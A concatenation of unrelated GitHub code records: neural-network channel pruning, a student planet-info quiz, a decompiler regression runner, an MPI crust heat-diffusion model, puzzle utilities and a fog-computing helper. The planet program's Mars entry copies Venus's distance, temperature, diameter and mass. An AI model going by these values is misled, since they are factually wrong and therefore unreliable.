PrunableConv2d)):\n # Print('Layer w dim:', layer.weight.shape, color='y')\n layer.weight_mask = (\n nn.Parameter(torch.ones([layer.weight.shape[0], 1, 1, 1, 1]).cuda())\n if use_cuda\n else nn.Parameter(torch.ones([layer.weight.shape[0], 1, 1, 1, 1]))\n )\n nn.init.xavier_normal_(layer.weight)\n layer.weight.requires_grad = False\n elif isinstance(layer, (PrunableDeconv3d, PrunableDeconv2d)):\n layer.weight_mask = (\n nn.Parameter(torch.ones([1, layer.weight.shape[1], 1, 1, 1]).cuda())\n if use_cuda\n else nn.Parameter(torch.ones([1, layer.weight.shape[1], 1, 1, 1]))\n )\n nn.init.xavier_normal_(layer.weight)\n layer.weight.requires_grad = False\n\n if spatial_ndim == 3:\n snip_conv_forward = snip_forward_conv3d\n snip_deconv_forward = snip_forward_deconv3d\n elif spatial_ndim == 2:\n snip_conv_forward = snip_forward_conv2d\n snip_deconv_forward = snip_forward_deconv2d\n\n # Override the forward methods:\n if isinstance(layer, (PrunableConv3d, PrunableConv2d)):\n layer.forward = types.MethodType(snip_forward_conv3d, layer)\n\n if isinstance(layer, (PrunableDeconv3d, PrunableDeconv2d)):\n layer.forward = types.MethodType(snip_forward_deconv3d, layer)\n\n # Compute gradients (but don't apply them)\n net.zero_grad()\n outputs = net.forward(inputs)\n loss = loss_fn(outputs, targets)\n loss.backward()\n\n grads_abs, idx = [], []\n for i, layer in enumerate(net.modules()):\n if isinstance(layer, PrunableWeights):\n grads_abs.append(torch.abs(torch.squeeze(layer.weight_mask.grad)))\n idx.append(i)\n # Print('Layer:', layer, 'weight shape:', layer.weight.shape, color='r')\n # if isinstance(layer, nn.BatchNorm3d):\n # Print('BN:', layer, 'bn shape:', layer.weight.shape, color='g')\n\n # Gather all scores in a single vector and normalise\n all_scores = torch.cat([torch.flatten(x) for x in grads_abs])\n norm_factor = torch.sum(all_scores)\n all_scores.div_(norm_factor)\n Print(\n \"Scores min:\",\n torch.min(all_scores),\n \"Scores max:\",\n torch.max(all_scores),\n \"Scores mean:\",\n torch.mean(all_scores),\n color=\"y\",\n )\n if output_dir and os.path.isdir(output_dir):\n with open(os.path.join(output_dir, \"snip_chs_scores.json\"), \"w\") as f:\n json.dump(all_scores.cpu().numpy().tolist(), f)\n\n if keep_ratio > 0:\n num_params_to_keep = int(len(all_scores) * keep_ratio)\n threshold, _ = torch.topk(all_scores, num_params_to_keep, sorted=True)\n acceptable_score = threshold[-1]\n else:\n acceptable_score = np.mean(all_scores)\n\n keep_masks = []\n for i, g in enumerate(grads_abs):\n if 1 < i < len(grads_abs) - 1:\n msk = (g / norm_factor) >= acceptable_score\n if torch.sum(msk) >= min_chs:\n keep_masks.append(msk.cpu().float())\n else:\n ids = torch.topk(g, k=min_chs)[1]\n keep_masks.append(torch.zeros(len(g)).scatter_(0, ids.cpu(), 1))\n else: # keep last conv channel num\n msk = torch.ones(len(g))\n keep_masks.append(msk)\n\n if output_dir and os.path.isdir(output_dir):\n out_mask = [m.numpy().tolist() for m in keep_masks]\n with open(\n os.path.join(output_dir, \"snip_ch_mask_{}.json\".format(keep_ratio)), \"w\"\n ) as f:\n json.dump(out_mask, f)\n\n remains = torch.sum(torch.cat([torch.flatten(x == 1) for x in keep_masks]))\n Print(\"Remain #{} channels\".format(remains), color=\"g\")\n\n return keep_masks\n","repo_name":"Project-Strix/Strix","sub_path":"strix/models/cnn/layers/snip.py","file_name":"snip.py","file_ext":"py","file_size_in_byte":16302,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"51"} +{"seq_id":"16535552244","text":"\"\"\"\n'Solar Search' VERSION 2.0\nAuthor: Lucas Purcell\n(COP 1500 Integration Project)\n This program will provide information about the planets in our solar system.\n\"\"\"\n\nprint(\"Hello! Welcome to Solar Search! In this program, you will type the name of a planet,\\n\"\n \"and information about that planet will be shown!\")\n\nwhile True:\n try:\n user_age = int(input(\"Please enter your age: \"))\n except ValueError:\n print(\"Sorry, your age must be a whole number\\n\"\n \"Please try again.\")\n continue\n if user_age < 1:\n print(\"Sorry, your age must be positive.\\n\"\n \"Please try again.\")\n continue\n else:\n user_age = str(user_age)\n break\n\nwhile True:\n try:\n user_name = input(\"Please enter your name: \")\n except ValueError:\n print(\"Sorry, your name can't be a number.\\n\"\n \"Please try again.\")\n continue\n else:\n user_name = str(user_name)\n break\n\nprint(\"Hello, \" + user_name.capitalize() + \"! \" + user_age + \" is the perfect age to learn about \"\n \"the planets in our solar system!\")\n\n\ndef display_planet_data(name, dist, temp, orbit, grav, diam, mass):\n \"\"\"Creates a display of information that correlates\n to the selected planet (name).\"\"\"\n print(\"Name: \" + name)\n print(\"Distance from the sun: \" + dist)\n print(\"Temperature range: \" + temp)\n print(\"Orbital period: \" + orbit)\n print(\"Equatorial surface gravity(Earth = 1): \" + grav)\n print(\"Mean diameter: \" + diam)\n print(\"Mass(Earth = 1): \" + mass)\n\n\nprint(\"Please choose from the list below to learn about that planet. \\n\")\n\n\n# list of planets to show the user their options\nplanets = ['Mercury', 'Venus', 'Earth', 'Mars', 'Jupiter', 'Saturn', 'Uranus', 'Neptune', 'Pluto\\n']\n\n# formats planet names into a numbered list\nfor index, value in enumerate(planets, 1):\n print(\"{}. {}\".format(index, value))\n\n\ndef mercury():\n display_planet_data(name='Mercury', dist='0.39', temp='-180ºC to 430ºC', orbit='0.24 Earth Years', grav='0.38',\n diam='4,878km', mass='0.055')\n\n\ndef venus():\n display_planet_data(name='Venus', dist='0.72', temp='465ºC', orbit='0.62 Earth Years', grav='0.9', diam='12,104km',\n mass='0.815')\n\n\ndef earth():\n display_planet_data(name='Earth', dist='1', temp='-89ºC to 58ºC', orbit='1 Earth Year', grav='1', diam='12,756km',\n mass='1')\n\n\ndef mars():\n display_planet_data(name='Mars', dist='0.72', temp='465ºC', orbit='0.62 Earth Years', grav='0.9', diam='12,104km',\n mass='0.815')\n\n\ndef jupiter():\n display_planet_data(name='Jupiter', dist='5.20', temp='-150ºC', orbit='11.86 Earth Years', grav='2.64',\n diam='142,800km', mass='318')\n\n\ndef saturn():\n display_planet_data(name='Saturn', dist='9.54', temp='-170ºC', orbit='29.46 Earth Years', grav='0.93',\n diam='120,000km', mass='95')\n\n\ndef uranus():\n display_planet_data(name='Uranus', dist='19.18', temp='-200ºC', orbit='84.01 Earth Years', grav='0.89',\n diam='51,118km', mass='15')\n\n\ndef neptune():\n display_planet_data(name='Neptune', dist='30.06', temp='-210ºC', orbit='164.8 Earth Years', grav='1.12',\n diam='49,528km', mass='17')\n\n\ndef pluto():\n display_planet_data(name='Pluto', dist='39.44', temp='-220ºC', orbit='247.7 Earth Years', grav='0.06',\n diam='2,300km', mass='0.002')\n\n\ndef rerun():\n while True:\n run_choice = input(\n 'Would you like to learn about a different planet?: ') # maybe include an is.upper command after this line\n run_choice = run_choice.upper()\n if run_choice == 'YES':\n break\n elif run_choice == 'NO':\n print(\"Thanks for using Solar Search!\")\n print(\"Goodbye!\")\n print(\"<<< PROGRAM TERMINATED >>>\")\n quit()\n else:\n print(\"Invalid Input\")\n print(\"Please try again!\")\n\n\ndef main():\n \"\"\"Calls the appropriate function for each planet that is requested\n by the user. If the user would like to view another planet, they are asked which planet.\"\"\"\n while True:\n user_input = input(str('Type planet here: '))\n user_input = user_input.lower()\n if user_input == 'mercury':\n mercury()\n rerun()\n elif user_input == 'venus':\n venus()\n rerun()\n elif user_input == 'earth':\n earth()\n rerun()\n elif user_input == 'mars':\n mars()\n rerun()\n elif user_input == 'jupiter':\n jupiter()\n rerun()\n elif user_input == 'saturn':\n saturn()\n rerun()\n elif user_input == 'uranus':\n uranus()\n rerun()\n elif user_input == 'neptune':\n neptune()\n rerun()\n elif user_input == 'pluto':\n pluto()\n rerun()\n else:\n print('please check your spelling and try again')\n\n\nmain()\n\n\"\"\"\nCITATIONS:\nPlanet Data:\n https://www.windows2universe.org/our_solar_system/planets_table.html\n https://www.universetoday.com/33415/interesting-facts-about-the-planets/\n https://mars.nasa.gov/all-about-mars/facts/\n https://www.universetoday.com/15182/interesting-facts-about-jupiter/\n https://theplanets.org/the-sun/\nPython Help:\n https://docs.python.org/3/library/time.html\n https://www.w3schools.com/python/python_try_except.asp\n https://www.programiz.com/python-programming/break-continue\n\"\"\"\n","repo_name":"lukecpurcell/Solar-Search","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41337373883","text":"#!/usr/bin/env python\n# Boomerang test functional test runner\n# ARGV[0] test_executable\n# ARGV[1] platform\n# ARGV[2] test\n# ARGV[3] test-set\n# ARGV[4] options\n# ARGV[5] parameters to the recompiled executable\n\nimport os\nimport subprocess\nimport shutil\nimport sys\nimport time\nimport operator\nfrom collections import defaultdict\n\nTESTS_DIR=\".\"+os.sep+\"tests\"\nTEST_INPUT=os.path.join(TESTS_DIR,\"inputs\")\n\nprint(\"Regression tester 0.0.1\\n\")\nFAILED_COMMANDLINES=\"\"\ndef perform_test(exepath,test_file,output_path,args):\n log_name = output_path\n file_size = os.path.getsize(test_file)\n upper_dir = os.sep.join(output_path.split(os.sep)[:-1])\n cmdline = ['-P',os.getcwd(),'-o',upper_dir] + args + [test_file]\n test_stdout = open(log_name+\".stdout\", \"w\")\n test_stderr = open(log_name+\".stderr\", \"w\")\n start_t = time.time()\n result = subprocess.call([exepath]+cmdline, stdout=test_stdout, stderr=test_stderr)\n end_t = time.time()\n test_stdout.close()\n test_stdout.close()\n sys.stdout.write('.' if result == 0 else '!')\n return [result == 0, ' '.join(cmdline), test_file, float(file_size)/(end_t-start_t)]\n\nif os.path.isdir(os.path.join(TESTS_DIR,\"outputs_prev\")):\n shutil.rmtree(os.path.join(TESTS_DIR,\"outputs_prev\"))\n\nif os.path.isdir(os.path.join(TESTS_DIR,\"outputs\")):\n shutil.move(os.path.join(TESTS_DIR,\"outputs\"),os.path.join(TESTS_DIR,\"outputs_prev\"))\n\n#exit(1)\n#sh -c \"./boomerang -o functest $4 test/$1/$2 2>/dev/null >/dev/null\"\ncrashes = defaultdict(list)\ntimes = {}\n\ndef test_all_inputs_in(base_dir, dirname=\"\"):\n if dirname != \"\":\n sys.stdout.write(\"\\nTesting in \" + os.path.join(base_dir,\"inputs\",dirname))\n current_dir = os.path.join(base_dir, dirname)\n input_dir = os.path.join(base_dir, \"inputs\", dirname)\n output_dir = os.path.join(base_dir, \"outputs\", dirname)\n machine = \"\"\n if dirname != \"\":\n machine = dirname.split(os.sep)[0] # assumption here is that inputs are always in /inputs/\n for f in os.listdir(input_dir):\n source = os.path.join(base_dir, \"inputs\", dirname, f)\n if os.path.isdir(source):\n test_all_inputs_in(base_dir,os.path.join(dirname,f)) # recurse\n else:\n test_path = source\n result_path = os.path.join(base_dir,\"outputs\",dirname,f)\n try:\n os.makedirs(result_path)\n except:\n pass\n test_res = perform_test(sys.argv[1],source,result_path,sys.argv[2:])\n assert(not test_res[0] or os.path.isfile(os.path.join(output_dir,\"log\")))\n try:\n shutil.move(os.path.join(output_dir,\"log\"),os.path.join(output_dir,f+\".log\"))\n except:\n pass\n\n if not test_res[0]:\n crashes[machine].append([source,test_res[1]])\n elif test_res[3] != None:\n times[test_res[2]] = test_res[3]\n\ntest_all_inputs_in(TESTS_DIR)\nfor machine, crash_list in crashes.iteritems():\n print(\"\\nEncountered \"+str(len(crash_list))+\" program failures for \"+machine)\n for test in crash_list:\n print(\"Decompiler failed on \"+test[0]+\" - \"+str(test[1]))\n\nsorted_times = sorted(times.iteritems(), key=operator.itemgetter(1), reverse=True)\nprint(\"Slowest run in bytes/sec \"+sorted_times[0][0]+\" - \"+str(sorted_times[0][1])+\" bytes/sec\")\n\n#Dir.open(TESTS_DIR+\"/inputs\").each() {|f|\n# next if f==\".\" or f==\"..\"\n# FileUtils.mv(TESTS_DIR+\"/inputs/\"+f,TESTS_DIR+\"/outputs/\"+f) if f.end_with?(\".b\")\n#}\n#puts \"**************************************\\n\"\n","repo_name":"hakusdream/boomerang","sub_path":"regression_tester.py","file_name":"regression_tester.py","file_ext":"py","file_size_in_byte":3567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"29207878701","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom matplotlib import cm\nfrom mpl_toolkits.mplot3d import Axes3D\nimport os\nimport subprocess\nplt.rc('text', usetex=True)\nfrom mpi4py import MPI\nimport sys \n\n\ndef get_grid(mx, my, mz, Lx,Ly,Lz):\n #print('mx,my,mz = ',mx,my,mz)\n ix, iy, iz = Lx*np.linspace(0,1,mx), Ly*np.linspace(0,1,my), Lz*np.linspace(0,1,mz)\n x, y, z = np.meshgrid(ix,iy,iz, indexing='ij')\n #print('ix', ix), print('iy', iy), print('iz', iz)\n return x,y,z\n\ndef plot_grid(x,y,z,T, t, filename):\n def plot_boundary_only(x,y,z,T):\n #mx, my, mz = x.shape\n x[1:-1, 1:-1, 1:-1],y[1:-1, 1:-1, 1:-1],z[1:-1, 1:-1, 1:-1],T[1:-1, 1:-1, 1:-1] = np.nan, np.nan, np.nan, np.nan \\\n #This removes interior because we cannot see it anyway? reduces time to plot\n return x,y,z,T\n \n x,y,z,T = plot_boundary_only(x,y,z,T)\n fig = plt.figure(figsize=(15,15), facecolor = 'w')\n ax = fig.add_subplot(111, projection='3d')\n img = ax.scatter(x,y,z, c=T.reshape(-1), s=150, vmin = -2.5, vmax = 23, cmap=plt.inferno())\n cbar = fig.colorbar(img, orientation='horizontal', fraction=0.047, pad=0.15, aspect=15)\n plt.tick_params(axis='both', which='major', labelsize=18)\n cbar.ax.tick_params(labelsize=20)\n cbar.set_label(r'Temperature ($^oC$)', size = 22)\n \n ax.text(0,0,-15, 't = %i days'%t, fontsize=20)\n ax.set_xticklabels(['%i'%(l*W/Nw) for l in ax.get_xticks()])\n ax.set_yticklabels(['%i'%(l*L/Nl/1e3) for l in ax.get_yticks()])\n ax.set_zticklabels(['%i'%(l*D/Nd) for l in ax.get_zticks()])\n ax.set_ylabel('Y (km)', labelpad=20, fontsize=20)\n ax.set_xlabel('X (m)', labelpad=20, rotation=0, fontsize=20)\n ax.set_zlabel('Depth from surface (m)', rotation=0, fontsize=20)\n ax.invert_zaxis()\n ax.view_init(15, -20)\n #plt.tight_layout()\n #plt.savefig('tempevolution_plots/temp%s.png'%count)\n plt.savefig(filename, bbox_inches='tight')\n #plt.show()\n\n\ndef init_T(x,y,z, T_3d):\n #print('size of y = ', np.shape(y))\n T = np.zeros_like(x)\n #print('Size of T = ',np.shape(T))\n T = T_3d\n return T\n\ndef show_plot(crust, t):\n fig, ax = plt.subplots(1,1, figsize=(5,4))\n im = ax.imshow(crust, vmin=0, vmax=20, cmap = 'inferno', aspect = 1 * (Nw/Nd))\n cbar = fig.colorbar(im, ax=ax)\n cbar.set_label('$\\mathrm{Temperature\\ [K]}$', rotation=270, labelpad=15)\n ax.set_title('$\\mathrm{t = %i\\ days}$'%t)\n ax.set_xlabel('$\\mathrm{Width}$')\n ax.set_ylabel('$\\mathrm{Depth}$')\n\n\ncomm = MPI.COMM_WORLD\nNtasks = comm.Get_size()\nThisTask = comm.Get_rank()\n\n\n# Constants (currently set for Earth vals)\n\nTinit = 10 # C\nTvar = 12 # C\nTbottom = 11 # C\n\n# Diffusion constant (https://www.nature.com/articles/nature07818)\nalpha = 0.0864 # m^2 / day\n#alpha = 0.389 #m^2 / day (https://terra-docs.s3.us-east-2.amazonaws.com/IJHSR/Articles/volume4-issue3/2022_43_p17_Murgia.pdf)\n\n# times\ntyear = 11.2 # days in a year of proxima b\nti = 0 # d\ntf = 1*tyear # d\ndt = 0.1 # d\n\nTemp_day = 7 #C\ntday = 1 #day\n\n# Depth, width, length (need to keep dt < a**2/(2*alpha))\nD = 10 # m\nNd = 40\nW = 50 # m\nNw = 50\nL = 4e6 # m\nNl = 100\nad = D/Nd\nal = L/Nl\n\n\n#We will be deviding the 2D array colum-wise among the tasks\n\nindex_high = int(((ThisTask + 1) * Nl) / Ntasks) #setting upper bound of column no for each task\nindex_low = int((ThisTask * Nl) / Ntasks) #setting lower bound of column no for each task\ndel_index = int(Nl / Ntasks) #For now please provide Ntasks such that del_index is automatically int\n#print('del_index = {}'.format(del_index))\n#sys.stdout.flush()\n\n\n# Read in flare info from Vida+2019\nenergy = np.genfromtxt('vida+2019_flares.txt', usecols=3, skip_header=2)\nelen = len(energy)\n# Probability of a flare occuring in dt = number of flares / number of dt in 50 days \nflare_prob = elen / (50/dt)\n\n# energy = np.append(energy, 1e34)\n\n# Ergs in a given dt:\npcen_energy = 6.03e30 * 24*60*60 * dt\nflare_factor = 4.8*energy / pcen_energy * (Tinit+Tvar+Temp_day)\n\n\ncrust = np.full((Nd,Nl), Tinit, dtype='float')\n#crust = np.ones((Nd,Nl), dtype = 'float') * Tinit\ncrust[Nd-1] = Tbottom\n\n#initializing the cells\ncell_left = np.zeros(1)\ncell_right = np.zeros(1)\n#cell_upper = np.zeros(1)\n#cell_lower = np.zeros(1)\n\n\ncount = 0 #for plotting\n\nif ( (dt*alpha/ad**2 > 0.5) or (dt*alpha/al**2 > 0.5)):\n dt = 0.5*min(ad,al)**2/alpha\n print('dt adjusted to {}'.format(dt))\n sys.stdout.flush()\nfor t in np.arange(ti, tf+dt, dt):\n # Randomly choose if a flare happens; if yes, pick from the flare list. \n if np.random.rand() < flare_prob:\n idx = np.random.randint(elen)\n flare_change = flare_factor[idx]\n print('Careful, flare at t = %.2f days! id = %i, Tchange = %.2E K '%(\n t, idx, flare_factor[idx]))\n else:\n flare_change = 0\n \n\n # periodic heating at surface with phase shift (INCORRECT ON SUB-DAY TIMESCALE)\n phase = np.arange(Nl)/Nl\n crust[0] = Tinit + Tvar*np.sin(2*np.pi*(t/tyear+phase)) + Temp_day*np.sin(2*np.pi*(t/tday + phase)) + flare_change\n\n crust_thistask = crust[:,index_low:index_high]\n nrow, ncol = np.shape(crust_thistask)\n #print('Shape of crust_thistask is= {}, in task = {}'.format(np.shape(crust_thistask), ThisTask))\n #sys.stdout.flush()\n\n print('Parallelization begins......')\n sys.stdout.flush()\n\n if ThisTask == 0 : #rank == 0\n for i in range(1,nrow-1):\n for j in range(0,ncol-1):\n if ((j-1) < index_low):\n #cell_left = comm.irecv(source = Ntasks-1, tag = Ntasks-1)\n #print('Left cell received at task {} of {} from task {}'.format(ThisTask, Ntasks, Ntasks-1))\n #sys.stdout.flush()\n #cell_right = crust_thistask[i,j+1]\n cell_left = np.zeros(1)\n comm.isend(crust_thistask[i,j], dest = Ntasks-1, tag = 0)\n #print('Right cell sent from task {} of {} to task {}'.format(ThisTask, Ntasks, Ntasks-1))\n #sys.stdout.flush()\n #print('Waiting to receive left cell at task {}'.format(ThisTask))\n cell_left_req = comm.irecv(cell_left, source = Ntasks-1, tag = Ntasks-1)\n #cell_left_req.wait()\n #print('Left cell received at task {} of {} from task {}'.format(ThisTask, Ntasks, Ntasks-1))\n #sys.stdout.flush()\n cell_left = cell_left[0]\n cell_right = crust_thistask[i,j+1]\n cell_upper = crust_thistask[i+1,j]\n cell_lower = crust_thistask[i-1,j]\n elif ((j+1) > index_high):\n cell_left = crust_thistask[i,j-1]\n #print('Waiting to receive left cell at task {}'.format(ThisTask))\n cell_right = np.zeros(1)\n cell_right_req = comm.irecv(cell_right, source = 1, tag = 1)\n #cell_right_req.wait()\n #print('Right cell received at task {} of {} from task {}'.format(ThisTask, Ntasks, 1))\n #sys.stdout.flush()\n cell_right = cell_right[0]\n comm.isend(crust_thistask[i,j], dest = 1, tag = 0)\n #print('Left cell sent from task {} of {} to task {}'.format(ThisTask, Ntasks, 1))\n #sys.stdout.flush()\n cell_upper = crust_thistask[i+1,j]\n cell_lower = crust_thistask[i-1,j]\n else:\n cell_upper = crust_thistask[i+1,j]\n cell_lower = crust_thistask[i-1,j]\n cell_right = crust_thistask[i,j+1]\n cell_left = crust_thistask[i,j-1]\n #print('This is not a edge cell at task {}'.format(ThisTask))\n #sys.stdout.flush()\n crust_thistask[i,j] = crust_thistask[i,j] + dt * alpha * \\\n ( (cell_upper + cell_lower - 2 * crust_thistask[i,j] ) / ad**2 + \\\n (cell_right + cell_left - 2 * crust_thistask[i,j]) / al**2 )\n\n\n\n\n elif ThisTask != 0 :\n for i in range(1,nrow-1):\n for j in range(0,ncol-1):\n if ((j-1) < index_low):\n comm.isend(crust_thistask[i,j], dest=ThisTask-1, tag = ThisTask)\n #print('Right cell sent from task {} of {} to task {}'.format(ThisTask, Ntasks, ThisTask-1))\n #sys.stdout.flush()\n cell_left = np.zeros(1)\n #print('Waiting to receive left cell at task {}'.format(ThisTask))\n cell_left_req = comm.irecv(cell_left, source = ThisTask-1, tag = ThisTask-1)\n #cell_left_req.wait()\n #print('Left cell received at task {} of {} from task {}'.format(ThisTask, Ntasks, ThisTask-1))\n #sys.stdout.flush()\n cell_left = cell_left[0]\n cell_right = crust_thistask[i,j+1]\n cell_upper = crust_thistask[i+1,j]\n cell_lower = crust_thistask[i-1,j] \n elif ((j+1) > index_high): #if left cell needs to come from another task\n if (ThisTask < Ntasks-1):\n comm.isend(crust_thistask[i,j], dest = ThisTask+1, tag=ThisTask) #This is right edge, send to next task as left cell\n #print('Left cell sent from task {} of {} to task {}'.format(ThisTask, Ntasks, ThisTask+1))\n #sys.stdout.flush()\n cell_left = crust_thistask[i,j-1]\n #print('Waiting to receive left cell at task {}'.format(ThisTask))\n cell_right = np.zeros(1)\n cell_right_req = comm.irecv(cell_right, source = ThisTask+1, tag = ThisTask+1)\n #print('Right cell received at task {} of {} from task {}'.format(ThisTask-1, Ntasks, ThisTask+1))\n #sys.stdout.flush()\n cell_right = cell_right[0]\n cell_upper = crust_thistask[i+1,j]\n cell_lower = crust_thistask[i-1,j]\n else:\n comm.isend(crust_thistask[i,j], dest = 0, tag=ThisTask)\n cell_left = crust_thistask[i,j-1]\n #print('Waiting to receive left cell at task {}'.format(ThisTask))\n cell_right = np.zeros(1)\n cell_right_req = comm.irecv(cell_right, source = 0, tag = 0)\n #cell_right_req.wait()\n #print('Right cell received at task {} of {} from task {}'.format(ThisTask-1, Ntasks, ThisTask+1))\n #sys.stdout.flush()\n cell_right = cell_right[0]\n cell_upper = crust_thistask[i+1,j]\n cell_lower = crust_thistask[i-1,j]\n # elif ((j-1) < index_low):\n # comm.isend(crust_thistask[i,j], dest=ThisTask-1, tag = ThisTask)\n # cell_left = comm.irecv(source = ThisTask-1, tag = ThisTask-1)\n # cell_right = crust_thistask[i,j+1]\n else:\n cell_upper = crust_thistask[i+1,j]\n cell_lower = crust_thistask[i-1,j]\n cell_right = crust_thistask[i,j+1]\n cell_left = crust_thistask[i,j-1]\n #print('This is not a edge cell at task {}'.format(ThisTask)) \n #sys.stdout.flush()\n crust_thistask[i,j] = crust_thistask[i,j] + dt * alpha * \\\n ( (cell_upper + cell_lower - 2 * crust_thistask[i,j] ) / ad**2 + \\\n (cell_right + cell_left - 2 * crust_thistask[i,j]) / al**2 )\n\n\n crust_combined = comm.gather(crust_thistask, root = 0)\n print('Parallelization ends......')\n sys.stdout.flush()\n\n \n if (ThisTask == 0):\n #print('Shape of combined data = {}'.format(np.shape(crust_combined)))\n crust_combined = np.array(crust_combined, float)\n crust = np.zeros((Nd,Nl), float)\n #print('Shape of crust = {}'.format(np.shape(crust)))\n # index_low = i*del_index\n # index_high = (i+1) * del_index\n for i in range(np.shape(crust_combined)[0]):\n index_low = int(i*del_index)\n index_high = int((i+1) * del_index)\n #print('i, index_low, index_high = {},{},{}'.format(i, index_low, index_high))\n crust[:,index_low:index_high] = crust_combined[i,:] \n \n #print('FINAL RESULT AFTER PARALLELIZATION HAS SHAPE OF {}'.format(np.shape(crust)))\n \n if t%(tyear//5) == 0:\n crust_3d = np.zeros((Nw,Nl,Nd), float)\n \n for i in range(Nw):\n crust_3d[i,:,:] = crust.T\n \n nx, ny, nz = Nw, Nl, Nd\n Lx, Ly, Lz = nx-1, ny-1, nz-1\n x,y,z = get_grid(nx, ny, nz, Lx,Ly,Lz) # generate a grid with mesh size Δx = Δy = Δz = 1\n T = init_T(x,y,z, crust_3d)\n filename = 'test_parallel/tempevolution_plots/proxima_b_test/temp'+str(count).zfill(3)+'.png'\n plot_grid(x,y,z,T, t, filename)\n count += 1\n\n \n","repo_name":"niranjancroy/exoplanet_heat","sub_path":"heat_ftcs_parallel.py","file_name":"heat_ftcs_parallel.py","file_ext":"py","file_size_in_byte":13358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"69924023200","text":"# coding: utf-8\n\nimport numpy as np\n\n\ndef _convert_puzzle_to_dict(puzzle):\n\tmap = {}\n\tfor x, row in enumerate(puzzle):\n\t\tfor y, cell in enumerate(row):\n\t\t\tmap[(x, y)] = cell\n\treturn map\n\n\ndef _convert_list_to_dict(list, size):\n\tmap = {}\n\tfor y in range(size):\n\t\tfor x in range(size):\n\t\t\tmap[(x, y)] = list[x * size + y]\n\treturn map\n\n\ndef _convert_to_array(dict, size):\n\tarray = np.array([0] * size * size).reshape(size, size)\n\tfor (x, y), value in dict.items():\n\t\tarray[x][y] = value\n\treturn array\n\n\ndef get_key(dict, needle):\n\tfor key, value in dict.items():\n\t\tif value == needle:\n\t\t\treturn key\n\treturn None\n\ndef _convert_puzzle_to_list(puzzle):\n\tlst = [number for line in puzzle for number in line]\n\treturn (lst)\n","repo_name":"toferrari/N-Puzzle","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"18079843660","text":"def maior (*num):\n pos = 0\n maiorValor = - 9999\n\n while(pos < len(num)):\n\n if(num[pos]> maiorValor):\n\n maiorValor = num[pos]\n pos += 1\n\n print(maiorValor)\n\nmaior(2,7,10,25,37,45,-20)","repo_name":"Gleytton/Curso_em_Video_Python","sub_path":"99.py","file_name":"99.py","file_ext":"py","file_size_in_byte":219,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"25261223726","text":"#!/usr/bin/env python3\n\n################################################################\n# Exports a text file in json format to be imported as a list\n################################################################\n\nimport json\nimport sys\nimport os\n\n# get script path from arguments\npath = str(sys.argv[0])\npath_list = list(path.split(\"/\"))\n\n# build a relative path excluding the last argument\nrel_path = ''\nfor path in path_list[0:-1]:\n rel_path = rel_path + path + os.sep\n\n# Use that as the basis for importing the file\nfilename = f\"{rel_path}files/numbers.json\"\n\nnumbers = [2, 3, 5, 7, 11, 13]\n\nwith open(filename, 'w') as f:\n json.dump(numbers, f)\n","repo_name":"gerryw1389/python","sub_path":"learning/base-language/read-write-files/write-text/write-json-list.py","file_name":"write-json-list.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"43468114810","text":"import fogNode\r\nimport fogUser\r\nimport random\r\nimport constants\r\nimport numpy as np\r\n\r\n### A MODULE CONTAINING SOME USEFUL FUNCTIONS USED IN VARIOUS ASPECTS THE SYSTEM ###\r\n\r\ndef initalize(k, u):\r\n # initalizing 2 lists. One of k fogNodes and one of u fogUsers\r\n nodes = [];\r\n users = [];\r\n for i in range(k):\r\n temp = fogNode.fogNode(i);\r\n nodes.append(temp)\r\n for i in range(u):\r\n temp = fogUser.fogUser(k);\r\n users.append(temp);\r\n return nodes, users;\r\n \r\n\r\ndef generateDistances(start, end, k, u):\r\n # returning a 2d list with distances between every node and every user. Rows represent nodes and columns represent users\r\n # inputs is the minimum and maximum distance (start and end) non-inclusive and the number of nodes, k and users, u\r\n lista = [];\r\n for i in range(k):\r\n row = [];\r\n for j in range(u):\r\n temp = random.randrange(start, end) + random.random();\r\n row.append(temp);\r\n lista.append(row);\r\n \r\n return np.array(lista)\r\n\r\n\r\ndef computePUK(distArray, k, theta):\r\n # Calculate the Puk value for every possible pair of Node and User. Inputs is the distance array and its number of rows and the theta factor\r\n lista = [];\r\n for i in range(k):\r\n distRow = distArray[i];\r\n maxRow = max(distRow)\r\n distRowNormalized = distRow / maxRow;\r\n finalRow = np.power(distRowNormalized, theta)\r\n lista.append(finalRow);\r\n return np.array(lista);\r\n \r\ndef computeGUK(distArray, theta):\r\n # calcalate the Guk value for every possible pair of Node and User. Inpiuts is the distance array an the theta factor\r\n newArray = 1 / distArray;\r\n return np.power(newArray, theta);\r\n\r\ndef firstRound(k, u):\r\n # a random assignment of each user to a node for the first round. Returns an array of size u with the node number.\r\n lista = [];\r\n for i in range(u):\r\n lista.append(random.randrange(k));\r\n return lista;\r\n\r\ndef indices(lista, element):\r\n # given a list @lista and an element @element, return a list of all the indices in which @element occurs\r\n return [index for index, value in enumerate(lista) if value == element]\r\n\r\n\r\ndef computeRUK(nodeList, puks, guks, curNodeList, k, u):\r\n # computing the RUK values\r\n lista = [];\r\n for i in range(u):\r\n nodeIndex = curNodeList[i];\r\n node = nodeList[nodeIndex];\r\n usersOnNode = indices(curNodeList, nodeIndex);\r\n usersOnNode.remove(i);\r\n mysum = 0 ;\r\n for user in usersOnNode:\r\n mysum += puks[nodeIndex][user] * guks[nodeIndex][user];\r\n toLog = 1 + (puks[nodeIndex][i] * guks[nodeIndex][i]) / (constants.G0 + mysum) \r\n ruk = node.WK * np.log2(toLog)\r\n lista.append(ruk);\r\n \r\n return np.array(lista);\r\n\r\ndef computeFUK(nodeList, userList, curNodeList, k, u, RBTSScores):\r\n # computing the FUK values\r\n lista = [];\r\n accScore = sum(RBTSScores);\r\n if accScore == 0:\r\n factors = np.ones(u);\r\n 